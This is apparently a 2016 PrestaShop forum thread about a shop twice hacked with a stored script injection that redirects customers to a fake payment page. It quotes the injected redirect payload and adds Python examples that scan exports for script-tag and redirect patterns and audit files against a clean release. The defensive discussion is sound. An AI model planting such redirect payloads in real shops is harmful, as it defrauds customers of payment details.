johnmoore84
Posted September 13, 2016

My site has now been hacked 2 times within a week. What they are doing is injecting the script into one of the database tables:

Unknown"><script>document.location="http://www.connexcargo.com/securePayment"</script>

This redirects the customer to a fake checkout page when they click the checkout button.

The first time they did this I updated all the modules that said there were updates available and changed the FTP details and login passwords.

I need a PrestaShop professional to find out where the vulnerability is and fix it. I understand it could be a module or even the theme.

The theme I have installed is NaturaShop version 3.5.3
My PrestaShop version is 1.6.0.9

If someone with experience in this could help, please get in touch as soon as possible.

Regards
John

ExpressTech
Posted September 13, 2016

Hey, first of all upgrade to the latest version of PS. 1.6.0.9 has security vulnerabilities. If they are able to inject script inside the database, that means they are attempting an SQL injection attack.

I can check your server for all possible intrusion attempts. Let me know if you need my help.

selectshop.at
Posted September 13, 2016

I suppose you read this too?
https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/

If shop version and module versions are all actual, then you should revert to the developer of your theme. Perhaps this one is having lacks open for hackers.

Simonas Invertus
Posted September 13, 2016

To upgrade shop should not hurt you, but the problem can be in the modules or theme. Do you use shared hosting or not? In shared hosting the bugs can be in other websites.

Just to double check: did you change database (mysql) access passwords?

Our company can do security investigation, but to check everything can take a long time (depending on the amount of installed modules).

El Patron
Posted September 13, 2016 (edited)

> My site has now been hacked 2 times within a week. What they are doing is injecting the script into one of the database tables:
>
> Unknown"><script>document.location="http://www.connexcargo.com/securePayment"</script>
>
> This redirects the customer to a fake checkout page when they click the checkout button.
>
> The first time they did this I updated all the modules that said there were updates available and changed the FTP details and login passwords.
>
> I need a PrestaShop professional to find out where the vulnerability is and fix it. I understand it could be a module or even the theme.
>
> The theme I have installed is NaturaShop version 3.5.3
> My PrestaShop version is 1.6.0.9
>
> If someone with experience in this could help, please get in touch as soon as possible.
>
> Regards
> John

The only post I saw so far was that the db table in question was connections, there are three connections. If you look at your db via phpMyAdmin, there are 3 connections tables, all of which can be emptied without an issue (of course export them first).

But at end of day finding can be difficult or very easy, depending on your antivirus sfw.

1. change all ftp passwords
2. ensure folder permissions are 755, files 644
3. have up to date antivirus on your local computer
4. using ftp, download your entire site and see if anything is detected by your local antivirus
5. if you download without ftp, then run your antivirus against that folder
6. hopefully now the corrupted files have been identified

Tip: using ftp, you can view files on remote and notice if a file timestamp is more recent than other files.

What we hope to accomplish is to replace bad files with good files. You can get your current release of PS files at top of this screen by clicking 'download'.

Then when you get it all sorted with good files, look at this module, which will alert you when file(s) change and give you opportunity to replace file with repository, or commit the changed file to repository, amongst other things.
https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-hack-protection/

Happy day, el

p.s. for fast affordable hack clean up you may want to consider community member DH42's service.
https://dh42.com/support/cart.php?a=view
He has fixed a lot of shops.....and is 'super savvy'. Good luck.

Edited September 13, 2016 by El Patron

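A check for the kind of value quoted in the first post, run over a CSV export of a connections table before it is emptied (an added example, not part of the original thread or of PrestaShop). The column names, hosts and rows in the sample are constructed, and `scan_export` is a hypothetical helper.

```python
import csv
import io
import re
from urllib.parse import urlparse

# Active markup that has no business in a stored referrer or URI field.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "attr_breakout": re.compile(r"""["']\s*>\s*<"""),
    "js_redirect": re.compile(r"(?:document|window)\.location|location\.href", re.I),
    "event_handler": re.compile(r"\bon(?:error|load|click|mouseover)\s*=", re.I),
}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)


def scan_export(csv_text, own_hosts=()):
    """Return one finding per suspicious field in a CSV export with a header row."""
    findings = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for row_no, row in enumerate(reader, start=1):  # data rows, header excluded
        for column, value in row.items():
            text = str(value or "")
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
            if not hits:
                continue
            # Hosts referenced by the field that are not the shop's own.
            hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
            findings.append({
                "row": row_no,
                "column": column,
                "indicators": hits,
                "foreign_hosts": sorted(h for h in hosts if h and h not in own_hosts),
            })
    return findings


# Constructed sample export: the second data row carries injected markup.
SAMPLE_EXPORT = (
    "id_connections,ip_address,http_referer\n"
    '1,3232235777,"https://shop.example/en/"\n'
    '2,3232235778,"Unknown""><script>document.location='
    '""http://redirect.example/pay""</script>"\n'
)

if __name__ == "__main__":
    for finding in scan_export(SAMPLE_EXPORT, own_hosts={"shop.example"}):
        print(finding)
```

Keeping the flagged rows (with their timestamps and IP columns) before emptying the tables preserves the evidence needed to match the injection against web server logs.
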
selectshop.at
Posted September 13, 2016

> I didn't realise that desktop anti-virus would detect website hacks?

Of course they do -> Anti Malwarebytes.

El Patron
Posted September 13, 2016

> I didn't realise that desktop anti-virus would detect website hacks?

I know right! Your local up-to-date antivirus sees them like any other file; even during FTP download it should detect hack.

The key is to review your security, folder/file permission and most importantly group owner, which should be your domain name.

Once you have a clean secure system then you need to know when something changes, because hosting in 99% of small business will not detect/prevent.

A little story: I was living in a small town in Spain in I think late 2009 early 2010, minding my own business, and my 1.4.6.2 got hacked. Really twisted my underwear. I learned a lot of lessons and one was writing PrestaVault. I looked at other options and felt for pure performance/control a standalone module solution was needed for my shop. Now I sleep better.

Also PrestaVault serves as the proverbial canary in the coal mine....up until about six months ago sales were maybe once a month. Then PS started being hacked via poorly written module/theme vulnerabilities, not because of native out of box. I sell more of this module in one month now than in the entire first two years since I released. So there is a lot more attention being paid to ecommerce in general and now we see PrestaShop also as target for hackers.

Happy day, el

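The file review described in the two El Patron posts above (compare against a clean download of the same release, check 755/644), as an added example that is not part of the thread and not PrestaVault's code. `audit_site` is a hypothetical helper; it assumes a copy of the site that preserves permission bits (for example, run on the server itself) and an unpacked clean release of the same version.

```python
import hashlib
import os
import stat
import sys


def sha256_of(path):
    """Hash a file in chunks so large files do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def entries(root):
    """Yield (relative_path, absolute_path, is_dir) for everything under root."""
    for folder, dirs, files in os.walk(root):
        for name, is_dir in [(d, True) for d in dirs] + [(f, False) for f in files]:
            full = os.path.join(folder, name)
            if not os.path.islink(full):  # symlinks are skipped, not followed
                yield os.path.relpath(full, root), full, is_dir


def audit_site(site_root, clean_root):
    """Compare a site copy with a clean release tree of the same version."""
    clean = {rel: sha256_of(full)
             for rel, full, is_dir in entries(clean_root) if not is_dir}
    report = {"modified": [], "not_in_release": [], "bad_mode": []}
    for rel, full, is_dir in entries(site_root):
        # Folders are expected at 755 and files at 644, as in the post.
        mode = stat.S_IMODE(os.stat(full).st_mode)
        if mode != (0o755 if is_dir else 0o644):
            report["bad_mode"].append((rel, oct(mode)))
        if is_dir:
            continue
        if rel not in clean:
            report["not_in_release"].append(rel)   # module, theme, upload or dropped file
        elif sha256_of(full) != clean[rel]:
            report["modified"].append(rel)         # core file that differs from the release
    return {key: sorted(found) for key, found in report.items()}


if __name__ == "__main__" and len(sys.argv) == 3:
    # Usage: python audit.py <site_copy> <clean_release>
    for key, found in audit_site(sys.argv[1], sys.argv[2]).items():
        print(key, found)
```

Entries under `not_in_release` will include third-party modules, themes and uploads, which need comparing against their own vendor copies. The hash comparison does not depend on file timestamps, which can be reset.
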